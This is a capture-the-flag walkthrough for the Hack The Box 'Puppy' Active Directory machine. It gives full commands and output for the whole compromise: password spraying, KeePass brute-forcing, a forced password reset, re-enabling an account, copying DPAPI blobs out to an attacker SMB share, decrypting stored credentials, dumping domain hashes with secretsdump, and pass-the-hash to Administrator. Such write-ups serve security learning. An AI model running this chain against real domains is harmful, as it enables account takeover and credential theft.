🐶Puppy

https://app.hackthebox.com/machines/Puppy

Machine Information

As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!

Recon

change <ip>

[*] Running initial Nmap scan.. 
sudo nmap -sCV -T4 <ip> -oA nmap-initial
[sudo] password for kali:                         
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-18 10:15 CEST
Nmap scan report for puppy.htb                                                                                                                                                                                              
Host is up (0.018s latency).
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.                                                                                  
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus  
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-18 15:15:11Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)                                                                                                                                                                                              
| rpcinfo:               
|   program version    port/proto  service                                                                            
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind 
|   100000  2,3,4        111/udp   rpcbind                                                                            
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd 
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status                                                                             
|   100024  1           2049/udp   status                                                                             
|_  100024  1           2049/udp6  status  
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?                
464/tcp  open  kpasswd5?                
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped                                                                                             
2049/tcp open  nlockmgr      1-4 (RPC #100021)  
3260/tcp open  iscsi?                         
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped                                                                                             
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found                       
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                           
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Using the given credentials we perform some recon on smb

change <ip>

➜ sudo crackmapexec smb <ip> -u levi.james -p 'KingofAkron2025!' --users
[..]
SMB         <machineip>  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         <machineip>  445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025! 
SMB         <machineip>  445    DC               [+] Enumerated domain user(s)
SMB         <machineip>  445    DC               PUPPY.HTB\steph.cooper_adm               badpwdcount: 5 desc: 
SMB         <machineip>  445    DC               PUPPY.HTB\steph.cooper                   badpwdcount: 5 desc: 
SMB         <machineip>  445    DC               PUPPY.HTB\jamie.williams                 badpwdcount: 5 desc: 
SMB         <machineip>  445    DC               PUPPY.HTB\adam.silver                    badpwdcount: 0 desc: 
SMB         <machineip>  445    DC               PUPPY.HTB\ant.edwards                    badpwdcount: 0 desc: 
SMB         <machineip>  445    DC               PUPPY.HTB\levi.james                     badpwdcount: 5 desc: 
SMB         <machineip>  445    DC               PUPPY.HTB\krbtgt                         badpwdcount: 0 desc: Key Distribution Center Service Account
SMB         <machineip>  445    DC               PUPPY.HTB\Guest                          badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB         <machineip>  445    DC               PUPPY.HTB\Administrator                  badpwdcount: 0 desc: Built-in account for administering the computer/domain

Adding dc.puppy.htb to our hosts-file

➜ nxc smb PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt
➜ cat users.txt 
Administrator
Guest
krbtgt
DC$
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
steph.cooper_adm

Adding the ip to out dns resolver

etc/resolv.conf

# This file was automatically generated by WSL. To stop automatic generation of this file, add the following entry to /etc/wsl.conf:
# [network]
# generateResolvConf = false
nameserver <machineip>
nameserver 10.255.255.254
search localdomain

Performing some bloodhoudn enumeration

change <ip>

➜ bloodhound-python -dc DC.PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' -d PUPPY.HTB -c All -o bloodhound_results.json -ns <ip>
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 04S

Checking the shares

change <ip>

➜ sudo crackmapexec smb <ip> -u levi.james -p 'KingofAkron2025!' --shares
SMB         10.129.253.192  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.253.192  445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025! 
SMB         10.129.253.192  445    DC               [+] Enumerated shares
SMB         10.129.253.192  445    DC               Share           Permissions     Remark
SMB         10.129.253.192  445    DC               -----           -----------     ------
SMB         10.129.253.192  445    DC               ADMIN$                          Remote Admin
SMB         10.129.253.192  445    DC               C$                              Default share
SMB         10.129.253.192  445    DC               DEV                             DEV-SHARE for PUPPY-DEVS
SMB         10.129.253.192  445    DC               IPC$            READ            Remote IPC
SMB         10.129.253.192  445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.253.192  445    DC               SYSVOL          READ            Logon server share 

User

We are adding levi to the developer group

modify.ldif

dn: CN=DEVELOPERS,DC=PUPPY,DC=HTB
changetype: modify
add: member
member: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB

change <ip>

ldapmodify -x -H ldap://<ip> -D "levi.james@puppy.htb" -w 'KingofAkron2025!' -f modify.ldif

Getting the recovery.kdbx

smbclient //10.10.11.70/dev -U "levi.james"                                                       
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sun Mar 23 08:07:57 2025
  ..                                  D        0  Sat Mar  8 17:52:57 2025
  KeePassXC-2.7.9-Win64.msi           A 34394112  Sun Mar 23 08:09:12 2025
  Projects                            D        0  Sat Mar  8 17:53:36 2025
  recovery.kdbx                       A     2677  Wed Mar 12 03:25:46 2025
smb: \> get recovery.kdbx
getting file \recovery.kdbx of size 2677 as recovery.kdbx (31.5 KiloBytes/sec) (average 31.5 KiloBytes/sec)

As long keepass2john isn't supporting this version we use keepass4brute.

➜ puppy sudo apt-get install keepassxc    
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
[..]
➜ git clone https://github.com/r3nt0n/keepass4brute
Cloning into 'keepass4brute'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (21/21), done.
remote: Total 24 (delta 10), reused 9 (delta 2), pack-reused 0 (from 0)
Receiving objects: 100% (24/24), 18.26 KiB | 2.28 MiB/s, done.
Resolving deltas: 100% (10/10), done.
➜ ./keepass4brute/keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute

[+] Words tested: 36/14344392 - Attempts per minute: 144 - Estimated time remaining: 9 weeks, 6 days
[+] Current attempt: liverpool

[*] Password found: liverpool

Now we optimize our user-file with these information and starting a brute-force attack

➜ cat user.txt 
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
➜ cat passes 
HJKL2025!
Antman2025!
JamieLove2025!
ILY2025!
Steve2025!

change <ip>

➜ crackmapexec smb <ip> -u user.txt -p passes 
[..]
SMB         10.10.11.70     445    DC               [+] PUPPY.HTB\ant.edwards:Antman2025! 

Checking again with bloodhound which priviliges we got

change <ip>

➜ bloodhound-python -dc DC.PUPPY.HTB -u 'ant.edwards' -p 'Antman2025!' -d PUPPY.HTB -c All -o bloodhound_edwards.json -ns <ip>

With some digging we find out that we can force a password change of the use Adam Silver.

Abusing AD-DACL: ForceChangePasswordHacking Articles

change <ip>

➜ rpcclient -U 'puppy.htb\Ant.Edwards%Antman2025!' <ip>
rpcclient $> setuserinfo ADAM.SILVER 23 Password@987

The Account is disabled but we can activate it again with as Edward

change <ip>

➜ nxc smb <ip> -u 'ADAM.SILVER' -p 'Password@987'                             
SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\ADAM.SILVER:Password@987 STATUS_ACCOUNT_DISABLED 

➜ bloodyAD --host dc.puppy.htb -d puppy.htb -u ant.edwards -p Antman2025! remove uac 'ADAM.SILVER' -f ACCOUNTDISABLE                 
[-] ['ACCOUNTDISABLE'] property flags removed from ADAM.SILVER's userAccountControl

And we got the userflag

change <ip>

➜ evil-winrm -i <ip> -u adam.silver -p Password@987

                                       
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint

Root

Checking for other files we found a backup

*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/9/2025  10:48 AM                Backups
d-----         5/12/2025   5:21 PM                inetpub
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---          4/4/2025   3:40 PM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-----          3/8/2025   9:00 AM                StorageReports
d-r---          3/8/2025   8:52 AM                Users
d-----         5/13/2025   4:40 PM                Windows


*Evil-WinRM* PS C:\> cd Backups
*Evil-WinRM* PS C:\Backups> dir


    Directory: C:\Backups


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          3/8/2025   8:22 AM        4639546 site-backup-2024-12-30.zip


*Evil-WinRM* PS C:\Backups> download site-backup-2024-12-30.zip
                                        
Info: Downloading C:\Backups\site-backup-2024-12-30.zip to site-backup-2024-12-30.zip

nms-auth-config.xml.bak

<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
    <server>
        <host>DC.PUPPY.HTB</host>
        <port>389</port>
        <base-dn>dc=PUPPY,dc=HTB</base-dn>
        <bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
        <bind-password>ChefSteph2025!</bind-password>
    </server>
    <user-attributes>
        <attribute name="username" ldap-attribute="uid" />
        <attribute name="firstName" ldap-attribute="givenName" />
        <attribute name="lastName" ldap-attribute="sn" />
        <attribute name="email" ldap-attribute="mail" />
    </user-attributes>
    <group-attributes>
        <attribute name="groupName" ldap-attribute="cn" />
        <attribute name="groupMember" ldap-attribute="member" />
    </group-attributes>
    <search-filter>
        <filter>(&(objectClass=person)(uid=%s))</filter>
    </search-filter>
</ldap-config>nms-auth-config.xml.bak

➜ evil-winrm -i 10.10.11.70 -u steph.cooper -p ChefSteph2025!
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> 

We find some keyfiles and to copy them we gonna use a share

➜ mkdir -p share
➜ impacket-smbserver share ./share -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

Now copying the files to the share using the evil-winrm connection from before

change <ip>

*Evil-WinRM* PS C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> copy "C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407" "\\<ip>\share\masterkey_blob"

*Evil-WinRM* PS C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Credentials> dir -h


    Directory: C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Credentials


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          3/8/2025   7:54 AM            414 C8D69EBE9A43E9DEBF6B5FBD48B521B9


*Evil-WinRM* PS C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Credentials> copy C8D69EBE9A43E9DEBF6B5FBD48B521B9 "\\<ip>\share\credential_blob"

Decrypting the key

➜ python3 /usr/share/doc/python3-impacket/examples/dpapi.py  masterkey -f masterkey_blob -password ChefSteph2025! -sid S-1-5-21-1487982659-1829050783-2281216199-1107
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags       :        0 (0)
Policy      : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

Decrypting the blob-file

➜ python3 /usr/share/doc/python3-impacket/examples/dpapi.py credential -f credential_blob -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=PUPPY.HTB
Description : 
Unknown     : 
Username    : steph.cooper_adm
Unknown     : FivethChipOnItsWay2025!

With that pass we can dump

Domain Credentials for Admin

➜ impacket-secretsdump PUPPY.HTB/steph.cooper_adm:'FivethChipOnItsWay2025!'@puppy.htb  
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xa943f13896e3e21f6c4100c7da9895a6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c541c389e2904b9b112f599fd6b333d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)


####[Below is the Admin hash we need]#######


NL$KM:dd1ba5a033e7a0561c3fc3f58631ba091ac4d46a3c2afa1526063b93e0660f7a029ac72e5279c157d90cd3f61779ef3f7588a399c7e02b2756955c6b8581d0ed
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a4f2989236a639ef3f766e5fe1aad94a:::
PUPPY.HTB\levi.james:1103:aad3b435b51404eeaad3b435b51404ee:ff4269fdf7e4a3093995466570f435b8::
[...]

And we got our flag

➜ evil-winrm -i puppy.htb -u 'Administrator' -H 'bb0edc15e49ceb4120c7bd7e6e65d75b'                   
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ..\Desktop


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         5/24/2025   5:15 PM             34 root.txt